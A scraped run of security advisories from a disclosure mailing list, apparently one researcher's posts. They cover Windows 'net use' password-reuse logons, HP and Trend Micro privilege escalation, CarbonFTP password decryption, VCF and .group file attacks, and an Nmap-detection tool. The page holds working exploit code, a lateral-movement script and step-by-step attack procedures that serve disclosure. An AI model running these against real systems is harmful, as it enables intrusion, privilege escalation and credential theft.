#Any lower and we may get inaccurate results. rdp_server_lst=[] #Return prior network logons to remote systems. def mountpoints2(): mntpoint2_connections=[] try: p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() except Exception as e: print("[!] "+str(e)) return False for x in tmp: idx = x.find("##") clean = x[idx:] idx2 = clean.rfind("#") ip = clean[2:idx2] ip = re.sub(r"#.*[A-Z,a-z]","",ip) if ip not in mntpoint2_connections: mntpoint2_connections.append(ip) mntpoint2_connections = list(filter(None, mntpoint2_connections)) p.kill() return mntpoint2_connections #Terminal server client stores remote server connections. def rdp_svrs(): global rdp_server_lst try: p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() for key in tmp: if key.find("Servers")!=-1: pos = key.rfind("\\") srv = key[pos + 1:].replace("\r\n","").strip() rdp_server_lst.append(srv) p.kill() except Exception as e: print("[!] "+str(e)) return False return True #Disconnect def del_vuln_connection(ip): try: print("[!] Disconnecting vuln network logon connection.\n") call(r"net use "+DRIVE+":"+" /del") except Exception as e: print("[!] "+str(e)) #Check connection def chk_connection(ip): print("[+] Testing: "+ip) sys.stdout.flush() cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) stderr, stdout = cmd.communicate() if "Reply from" in stderr and "Destination host unreachable" not in stderr: print("[*] Target up!") return True else: print("[!] Target unreachable :(") return False #Test vuln def Test_Password_Reuse(ip): print("[+] Testing "+ip + " the builtin Administrator account.\n") sys.stdout.flush() try: p = Popen("net use X: "+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) err = p.stderr.readlines() if err: e = str(err) if e.find("error 53")!=-1: print("[*] Network path not found\n") return elif e.find("error 1219")!=-1: print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") return elif e.find("error 85")!=-1: print("[*] The local device name is already in use.\n") return else: print(e+"\n") tmp = p.stdout.read() if FINDME in tmp: print("[*] Password reuse for the built-in Administrator found!") print("[+] Connected
[FD] Microsoft Windows "net use" Logon CMD / Insufficient Password Prompt
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]www.microsoft.com [Product] Windows "net use" Command Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. [Vulnerability Type] Insuffient Password Prompt [CVE Reference] N/A [Security Issue] The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to has other vulnerabilities present. In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. The authentication mechanism between the two network logon methods are inconsistent and in my opinon leaves an authentication loophole invitation. Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. Requirements: 1) Remote system built-in Administrator account is enabled 2) Origination system users account password and the remote system Administrator passwords match (reuse). Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections and try them and if theres password reuse (likely) BOOM automagic logon. This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. When testing make sure to logout then log back in after changing passwords so the environment is clean. e.g. 1) Passwords for both systems are different and remote built-in Administrator account active: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator Enter the password for 'Administrator' to connect to '192.168.x.x': System error 5 has occurred. Access is denied. 2) Passwords for both origination system and remote match: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator The command completed successfully. By the way as a side note DCERPC calls work as well, if both systems happen to have same password. c:\>getmac /s x.x.x.x /U Administrator MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? Expected result: Consistent password dialog box, no matter if passwords match or not. Actual Result: No prompt for a password if both systems passwords are the same. Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. [Exploit/POC] import os,re,time,signal,sys from subprocess import * from multiprocessing import Process #By John Page (aka hyp3rlinx) #Apparition Security #twitter.com/hyp3rlinx #--- #When a remote systems built-in Administrator account is enabled and both the remote and the target system #passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. # #MountPoints2 and Terminal server client hints in the Windows registry can help us. #Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. #REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) #MountPoints2 key entries are stored like '##10.2.1.40#c$' #--- BANNER=""" _ __ ___ __ ___ __ / | / / /_ __/ / | / __ )/ / / / ___// / / |/ / __/ / /
[FD] Recon-Informer v1 - Intel for offensive systems tool.
import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #Recon-Informer (c) #By John Page (Hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparition...@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #== # #Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_. # #DELETE FW RULE -d to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # #PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detection if we didn't check packets for them. #Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks: # #10=(0x00a) SYNPSH #34= (0x22) SYNURG #42=(0x02a) SYNPSHURG #66 (0x42) SYNECN #74 (0x04a) SYNPSHECN #98 (0x062) SYNURGECN #106 (0x06a) SYNPSHURGECN #130 (0x082) SYNCWR #138 (0x08a) SYNPSHCWR #162 (0x0a2) SYNURGCWR #170 (0x0aa) SYNPSHURGCWR #194 (0x0c2) SYNECNCWR #202 (0x0ca) SYNPSHECNCWR #226 (0x0e2) SYNURGECNCWR #234 (0x0ea) SYNPSHURGECNCWR # #Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!. #ip=IP(dst="192.168.1.104") #syn=TCP(sport=54030,dport=139,window=666,flags="
[FD] Recon-Informer v1 - Intel for offensive systems tool
Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive security systems, useful for penetration testers. It runs on Windows/Linux and leverages Scapy. https://github.com/hyp3rlinx/0/blob/master/Recon-Informer.py Thanks and stay safe to all, hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-18915 HP System Event Utility / Privilege Escalation Vulnerability
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.hp.com [Product] HP System Event Utility The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc. HP System Event Utility enables the functioning of special function keys on select HP devices. [Vulnerability Type] Local Privilege Escalation [CVE Reference] CVE-2019-18915 [Security Issue] The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. HPMSGSVC.exe runs a background process that delivers push notifications. The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe" if found in the users c:\ drive. Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe Two Handles are inherit, properties are Write/Read Name: \Device\ConDrv This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location and can be used to escalate privileges from Admin to SYSTEM. HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359 [References] PSR-2019-0204 https://support.hp.com/us-en/document/c06559359 [Network Access] Local [Disclosure Timeline] Vendor Notification: October 7, 2019 HP PSRT "product team will address the issue in next release" : January 13, 2020 HP advisory and mitigation release : February 10, 2020 February 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [UPDATED - POC] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857
Updated, exploit PoC had a check for an unused module was testing and removed, had two versions but previously sent the wrong one. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.neowise.com [Product] CarbonFTP v1.4 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later. Download: https://www.neowise.com/freeware/ Hash: 7afb242f13a9c119a17fe66c6f00a1c8 [Vulnerability Type] Insecure Proprietary Password Encryption [CVE Reference] CVE-2020-6857 [Affected Component] Password Encryption [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Security Issue] CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values. If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects". e.g. Password=STRING|"2086721956209392195620939" Observing some very short password examples we see interesting patterns: 27264 27360 27360 27360 27360= a 27520 27617 27617 27617 27617= b 27266 27616 27360 27361 27616= aab 27521 27616 27616 27616 27616= ba Password encryption/decryption is as follows. Encryption process example. 484C as decimal is the value 18508 97F hex to decimal is the value 2431 (encrypt key) 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL". To decrypt we just perform the reverse of the operation above. 20939 - 2431 = 18508 Next, convert the decimal value 18508 to hex and we get 484C. Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL". CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH" However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password. Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned. From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example. BPX @47DA6F 0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] | 0047DA72 | 50 | push eax | 0047DA73 | B9 05 00 00 00 | mov ecx,5 | 0047DA78 | 8B D3| mov edx,ebx | 0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 | 0047DA82 | 83 C3 05 | add ebx,5 | 0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867" 0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C | 0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431 0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax | 0047DA93 | 83 C6 02 | add esi,2 | 0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 | 0047DA9E | 3B D8| cmp ebx,ea
[FD] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.neowise.com [Product] CarbonFTP v1.4 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later. Download: https://www.neowise.com/freeware/ Hash: 7afb242f13a9c119a17fe66c6f00a1c8 [Vulnerability Type] Insecure Proprietary Password Encryption [CVE Reference] CVE-2020-6857 [Affected Component] Password Encryption [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Security Issue] CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values. If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects". e.g. Password=STRING|"2086721956209392195620939" Observing some very short password examples we see interesting patterns: 27264 27360 27360 27360 27360= a 27520 27617 27617 27617 27617= b 27266 27616 27360 27361 27616= aab 27521 27616 27616 27616 27616= ba Password encryption/decryption is as follows. Encryption process example. 484C as decimal is the value 18508 97F hex to decimal is the value 2431 (encrypt key) 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL". To decrypt we just perform the reverse of the operation above. 20939 - 2431 = 18508 Next, convert the decimal value 18508 to hex and we get 484C. Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL". CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH" However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password. Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned. From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example. BPX @47DA6F 0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] | 0047DA72 | 50 | push eax | 0047DA73 | B9 05 00 00 00 | mov ecx,5 | 0047DA78 | 8B D3| mov edx,ebx | 0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 | 0047DA82 | 83 C3 05 | add ebx,5 | 0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867" 0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C | 0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431 0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax | 0047DA93 | 83 C6 02 | add esi,2 | 0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 | 0047DA9E | 3B D8| cmp ebx,eax | 0047DAA0 | 7E CD| jle carbonftp.47DA6F | Ok, simple explanation after SetBPX in 47DA
[FD] CVE-2019-19697 / Trend Micro Security 2019 (Consumer) / Security Bypass Protected Service Tampering
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product] Trend Micro Security 2019 (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Security Bypass Protected Service Tampering [CVE Reference] CVE-2019-19697 [Security Issue] Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of registry key to target a process running as SYSTEM. This can allow a malware to gain elevated privileges to take over and shutdown services that require SYSTEM privileges like Trend Micros "Asmp" service "coreServiceShell.exe" which does not allow Administrators to tamper with them. This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start. Note administrator privileges are required to exploit this vulnerability. [CVSS 3.0 Scores: 3.9] [Affected versions] Platform Microsoft Windows Premium Security 2019 (v15) Maximum Security 2019 (v15) Internet Security 2019 (v15) Antivirus + Security 2019 (v15) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx [Exploit/POC] 1) Create a entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe 2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM. 3) Restart the machine or wait until service is restart then you get SYSTEM and can now disable Trend Micro endpoint security coreServiceShell.exe service [Network Access] Local [Severity] Low [Disclosure Timeline] Vendor Notification: October 8, 2019 Vendor confirms issue: October 28, 2019 Vendor release date: January 14, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-20357 / Trend Micro Security (Consumer) / Persistent Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product(s)] Trend Micro Security (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Persistent Arbitrary Code Execution [CVE Reference] CVE-2019-20357 [CVSSv3 Scores: 6.7] [Security Issue] Trend Micro Security can potentially allow an attackers to use a malicious program to escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system. [Product Affected Versions] Platform Microsoft Windows Premium Security 2019 (v15) and 2020 (v16) Maximum Security 2019 (v15) and 2020 (v16) Internet Security 2019 (v15) and 2020 (v16) Antivirus + Security 2019 (v15) and 2020 (v16) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx [Exploit/POC] Compile C test code "Program.c" void main(void){ puts("Done!"); system("pause"); } 1) Place under c:\ dir. 2) Reboot the machine, the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity. [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: October 8, 2019 vendor advisory: January 15, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows VCF Card / Mailto Link Denial Of Service
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI). [Vulnerability Type] Mailto Link Denial Of Service [CVE Reference] N/A [Security Issue] Windows VCF cards do not properly sanitize email addresses allowing for HTML injection. A corrupt VCF card can cause all the users currently opened files and applications to be closed and their session to be terminated without requiring any accompanying attacker supplied code. This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then kill all users applications and also log the target off their computer, if the VCF card is opened in using Windows Contacts and the link is clicked. The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args. This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file. Note, this exploit requires user interaction. [Exploit/POC] "VCF_DoS.py" dirty_vcf=( 'BEGIN:VCARD\n' 'VERSION:4.0\n' 'FN:Session Terminate PoC - ApparitionSec\n' 'EMAIL:d...@microsoft.com\n' 'END:VCARD') f=open("DoS.vcf", "w") f.write(dirty_vcf) f.close() print "VCF Denial Of Service card created!" print "By hyp3rlinx" [POC Video URL] https://www.youtube.com/watch?v=P4OGN7pZLSg [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: January 2, 2020 MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information to exploit another user remotely without the use of social engineering... As such, this thread is being closed" : January 3, 2020 January 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows .Group File / URL Field Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] apparitionsec@gmail [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Windows ".Group" File Type Gorup files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. It contains a list of contacts saved into a group; which can be used to create a mailing list for sending email messages to multiple addresses at once. [Vulnerability Type] URL Field Code Execution [CVE Reference] N/A [Security Issue] Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details" tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available. [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt Therefore, attacker supplied executables can run unexpected to the user, who thinks they visit a website when click the Website go button. Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is internet downloaded or copied from network share. This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness. [Exploit/POC] 1) create a Windows .group file 2) create a directory named "http" 3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com an place it in the "http" dir alongside .group file. 4) point the website URL to the executable using path traversal like "http.\ www.microsoft.com" which is the website address in the .group file. Note: the directory traversal can also point to other dirs like ..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy. 5) package it up in an archive .rar etc. 6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\\Contacts" directory. 7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder if not within that dir already) next click the website address go button. The attackers executable will run instead of navigating to a website as would be expected by an end user. [Severity] High [Disclosure Timeline] Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed. January 1, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows Media Center / XXE MotW Bypass (Anniversary Edition)
